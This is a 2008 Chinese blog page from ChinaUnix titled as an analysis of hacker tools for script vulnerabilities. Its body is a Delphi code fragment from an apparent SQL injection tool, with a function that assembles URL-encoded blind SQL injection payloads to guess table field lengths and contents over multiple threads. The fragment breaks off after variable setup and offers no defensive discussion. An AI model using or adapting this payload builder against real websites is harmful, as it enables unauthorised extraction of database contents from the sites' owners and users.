Chinaunix首页 | 论坛 | 博客

我的博客(linux)79471

首页 |  博文目录 |  关于我

5kdYeW0

  • 博客访问: 501909
  • 博文数量: 704
  • 博客积分: 39800
  • 博客等级: 大将
  • 技术积分: 4950
  • 用 户 组: 普通用户
  • 注册时间: 2008-10-15 13:32
文章分类

全部博文(704)

文章存档

2011年(1)

2008年(703)

我的朋友
最近访客
推荐博文
脚本漏洞之黑客工具分析

分类:

2008-10-15 13:43:47

 procedure TMainForm.GuessContProc(ListInt: integer); {SQL注入 - 多线程猜解字段内容}

function SQLTextFunc(URl, TopStr, TableName, FieldName, LevelStr: string; Len: integer): string;

begin

Result := Url + ’%20and%20exists(select%20*%20from%20’ + TableName +’%20where%20len(’ + FieldName + ’)’ + LevelStr + IntToStr(Len) + ’%20and%20id=(Select%20max(id)%20From%20’ + TableName +’%20where%20id%20in%20(select%20top%20’ + TOPStr + ’%20id%20from%20’ + TableName + ’%20Order%20by%20id)))’

end;

var

TableName: string;

FieldName, S: string;

ContentInt: integer;

i, Len, LengthInt, N: integer;

GridCount: integer;

Colu: TColumn;

FlagBool: boolean;

begin

Len := 0;I

LengthInt := 0;

FlagBool := True;

TableName := TableNameLst.Items[TableNameLst.Itemindex];

FieldName := Memo2.Lines[ListInt];


--------------------next---------------------

阅读(405) | 评论(0) | 转发(0) |
0

上一篇:工善其事先利其器 初级黑客常用兵器-安全频道-中国IT实验室-技术·资讯·教育·服务·社区

下一篇:网络安全方面的六大紧迫问题

给主人留下些什么吧!~~
关于我们 | 关于IT168 | 联系方式 | 广告合作 | 法律声明 | 免费注册

Copyright 2001-2010 ChinaUnix.net All Rights Reserved 北京皓辰网域网络信息技术有限公司. 版权所有

感谢所有关心和支持过ChinaUnix的朋友们

16024965号-6